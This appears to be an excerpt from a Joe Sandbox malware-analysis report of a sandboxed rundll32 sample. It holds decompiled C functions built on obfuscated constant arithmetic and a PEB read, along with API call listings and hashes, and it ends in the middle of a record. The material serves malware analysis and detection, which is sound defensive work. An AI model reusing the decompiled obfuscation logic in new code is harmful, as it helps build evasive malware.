                                                                                                                      				_v48 = _v48 << 0x10;
                                                                                                                      				_v48 = _v48 ^ 0x1dc99f4e;
                                                                                                                      				_v8 = 0x906d24;
                                                                                                                      				_v8 = _v8 | 0x748f1c77;
                                                                                                                      				_v8 = _v8 + 0xffff13d2;
                                                                                                                      				_v8 = _v8 * 0x4a;
                                                                                                                      				_v8 = _v8 ^ 0xb5d1b34d;
                                                                                                                      				_v32 = 0x99e404;
                                                                                                                      				_v32 = _v32 ^ 0xe9d0d5f4;
                                                                                                                      				_v32 = _v32 + 0x5a31;
                                                                                                                      				_v32 = _v32 ^ 0xe94bd9b5;
                                                                                                                      				_v16 = 0xd98a19;
                                                                                                                      				_v16 = _v16 + 0xffff99bf;
                                                                                                                      				_v16 = _v16 + 0x1a5b;
                                                                                                                      				_v16 = _v16 << 0xa;
                                                                                                                      				_v16 = _v16 ^ 0x64f05351;
                                                                                                                      				_v40 = 0x441d8c;
                                                                                                                      				_v40 = _v40 + 0xbe9c;
                                                                                                                      				_t138 = 0x7a;
                                                                                                                      				_v40 = _v40 / _t137;
                                                                                                                      				_v40 = _v40 ^ 0x00086b18;
                                                                                                                      				_v20 = 0xfc7ad5;
                                                                                                                      				_v20 = _v20 + 0x78e5;
                                                                                                                      				_v20 = _v20 + 0xffff6dfc;
                                                                                                                      				_v20 = _v20 + 0xa8d2;
                                                                                                                      				_v20 = _v20 ^ 0x00f25a11;
                                                                                                                      				_v44 = 0xb09661;
                                                                                                                      				_v44 = _v44 << 2;
                                                                                                                      				_v44 = _v44 + 0x5c70;
                                                                                                                      				_v44 = _v44 ^ 0x02c80175;
                                                                                                                      				_v12 = 0xc44555;
                                                                                                                      				_v12 = _v12 | 0x8aaf582b;
                                                                                                                      				_v12 = _v12 >> 3;
                                                                                                                      				_v12 = _v12 ^ 0x8e0d3178;
                                                                                                                      				_v12 = _v12 ^ 0x9f5e57b0;
                                                                                                                      				_v36 = 0x15e160;
                                                                                                                      				_v36 = _v36 << 7;
                                                                                                                      				_v36 = _v36 * 0x45;
                                                                                                                      				_v36 = _v36 ^ 0xf2df9ca5;
                                                                                                                      				_v24 = 0xe11875;
                                                                                                                      				_v24 = _v24 + 0xffffa15f;
                                                                                                                      				_v24 = _v24 / _t138;
                                                                                                                      				_v24 = _v24 ^ 0x000fcfe6;
                                                                                                                      				_v56 = 0xedc19c;
                                                                                                                      				_v56 = _v56 | 0x5ad96a0a;
                                                                                                                      				_v56 = _v56 ^ 0x5af69f46;
                                                                                                                      				_v52 = 0x112c39;
                                                                                                                      				_v52 = _v52 << 3;
                                                                                                                      				_v52 = _v52 ^ 0x00831cf8;
                                                                                                                      				_v28 = 0xaa6b89;
                                                                                                                      				_v28 = _v28 >> 4;
                                                                                                                      				_v28 = _v28 + 0xffff7c23;
                                                                                                                      				_v28 = _v28 ^ 0x00029c7f;
                                                                                                                      				_push(_v16);
                                                                                                                      				_push(_v32);
                                                                                                                      				_push(0x3412a4);
                                                                                                                      				E00343BF8(_v20, _v28, E0034AB66(_v48, _v8, _v28), _v44, _v12,  &_v592, _a8);
                                                                                                                      				E0034AE03(_v36, _v24, _v56, _t131);
                                                                                                                      				return E0034BAB0( &_v592, _v52, _v28);
                                                                                                                      			}


                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 008e4cd0db60346fa01f2895a3ffab4822719c71de510f6cae6d45b5308bac95
                                                                                                                      • Instruction ID: 039afd719c1e32c3fcd167ca617b762aaa5b9434476eecaa81a8e86cf345e19f
                                                                                                                      • Opcode Fuzzy Hash: 008e4cd0db60346fa01f2895a3ffab4822719c71de510f6cae6d45b5308bac95
                                                                                                                      • Instruction Fuzzy Hash: 835123B2D0131DEBCF44DFA5C94A4DEBBB2FB04314F208198E511BA260D7B91A09CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E003468DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				unsigned int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				void* _t87;
                                                                                                                      				signed int _t99;
                                                                                                                      				signed int _t100;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E0034CF25(_t87);
                                                                                                                      				_v8 = 0x73b8de;
                                                                                                                      				_v8 = _v8 ^ 0x19054fb7;
                                                                                                                      				_v8 = _v8 << 0xd;
                                                                                                                      				_v8 = _v8 + 0x3490;
                                                                                                                      				_v8 = _v8 ^ 0xdee55d26;
                                                                                                                      				_v20 = 0xe646cf;
                                                                                                                      				_v20 = _v20 >> 0xb;
                                                                                                                      				_v20 = _v20 ^ 0x0000515e;
                                                                                                                      				_v16 = 0xc8864d;
                                                                                                                      				_v16 = _v16 >> 7;
                                                                                                                      				_v16 = _v16 + 0xffff7ea5;
                                                                                                                      				_v16 = _v16 >> 1;
                                                                                                                      				_v16 = _v16 ^ 0x000d0f10;
                                                                                                                      				_v16 = 0xf76b6b;
                                                                                                                      				_v16 = _v16 + 0xffff8d96;
                                                                                                                      				_v16 = _v16 + 0xa530;
                                                                                                                      				_v16 = _v16 ^ 0x00f3b26e;
                                                                                                                      				_v28 = 0xad3635;
                                                                                                                      				_v28 = _v28 << 4;
                                                                                                                      				_v28 = _v28 ^ 0x0ad12e90;
                                                                                                                      				_v28 = 0xa7b230;
                                                                                                                      				_t99 = 0x21;
                                                                                                                      				_v28 = _v28 * 0x16;
                                                                                                                      				_v28 = _v28 ^ 0x0e6a6f58;
                                                                                                                      				_v28 = 0xa141da;
                                                                                                                      				_v28 = _v28 / _t99;
                                                                                                                      				_v28 = _v28 ^ 0x0004c009;
                                                                                                                      				_v16 = 0x3b52c9;
                                                                                                                      				_t100 = 0x69;
                                                                                                                      				_v16 = _v16 / _t100;
                                                                                                                      				_v16 = _v16 | 0xd3b68a53;
                                                                                                                      				_v16 = _v16 + 0xffff1b94;
                                                                                                                      				_v16 = _v16 ^ 0xd3beae71;
                                                                                                                      				_v12 = 0xce562d;
                                                                                                                      				_v12 = _v12 << 0x10;
                                                                                                                      				_v12 = _v12 << 0x10;
                                                                                                                      				_v12 = _v12 + 0xffff0c4b;
                                                                                                                      				_v12 = _v12 ^ 0xfffd1cdf;
                                                                                                                      				_v24 = 0x109fa9;
                                                                                                                      				_v24 = _v24 >> 8;
                                                                                                                      				_v24 = _v24 ^ 0x0002830d;
                                                                                                                      				return E003540F4(_v28, _v16, _a12, _v12, _v24, E00355BB3());
                                                                                                                      			}


                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d2a8de53734b9d3901bc94b6b25c32e81bc309cda1bfd67e32ed41b72a8c3f3f
                                                                                                                      • Instruction ID: 581617dc6a524ab47ee1232f08aca7877fdbfd719bb69cda969d514d618ce5c5
                                                                                                                      • Opcode Fuzzy Hash: d2a8de53734b9d3901bc94b6b25c32e81bc309cda1bfd67e32ed41b72a8c3f3f
                                                                                                                      • Instruction Fuzzy Hash: 5E31B1B6C0170DEBDF49DFE5D84A4EEBBB1BB10308F208599E611A6261D3B55B54CF80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0035D374() {
                                                                                                                      
                                                                                                                      				return  *[fs:0x30];
                                                                                                                      			}




                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                      • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                      • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                      • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                      • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                      • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                      • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                      • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014F68
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                      • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                      • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014FD9
                                                                                                                      • _memset.LIBCMT ref: 10014FF3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                      • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                      • API String ID: 434808117-483790700
                                                                                                                      • Opcode ID: 147489415d7f7f12e4b820da42085f8fd97c08a4daccd4d9168a1bbabc89fc72
                                                                                                                      • Instruction ID: f69531b56b144151f4c46f4c2f1acf85afd3bdedcb4b37807a4dae52f16cbedc
                                                                                                                      • Opcode Fuzzy Hash: 147489415d7f7f12e4b820da42085f8fd97c08a4daccd4d9168a1bbabc89fc72
                                                                                                                      • Instruction Fuzzy Hash: AD817171D002699FDB10DFA5DD44AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                      • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                      • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                      • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                      • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                      • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                      • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                      • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                      • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                      • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                      • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                      • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClipboardFormatRegister
                                                                                                                      • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                      • API String ID: 1228543026-2889995556
                                                                                                                      • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                      • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                      • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                      • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                      • __mtterm.LIBCMT ref: 100354A0
                                                                                                                        • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                        • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                        • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                        • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                      • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                      • __init_pointers.LIBCMT ref: 10035552
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                      • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                      • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                      • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                      • API String ID: 4287529916-3819984048
                                                                                                                      • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                      • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                      • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                      • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                        • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                      • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                      • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                      • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                      • _memset.LIBCMT ref: 1001CA70
                                                                                                                      • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                      • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                      • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                      • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                      • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                      • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                      • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                      • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                      • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                      • API String ID: 867647115-4034971020
                                                                                                                      • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                      • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                      • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                      • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4128688680-0
                                                                                                                      • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                      • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                      • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                      • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                      • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                      • API String ID: 667068680-68207542
                                                                                                                      • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                      • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                      • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                      • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
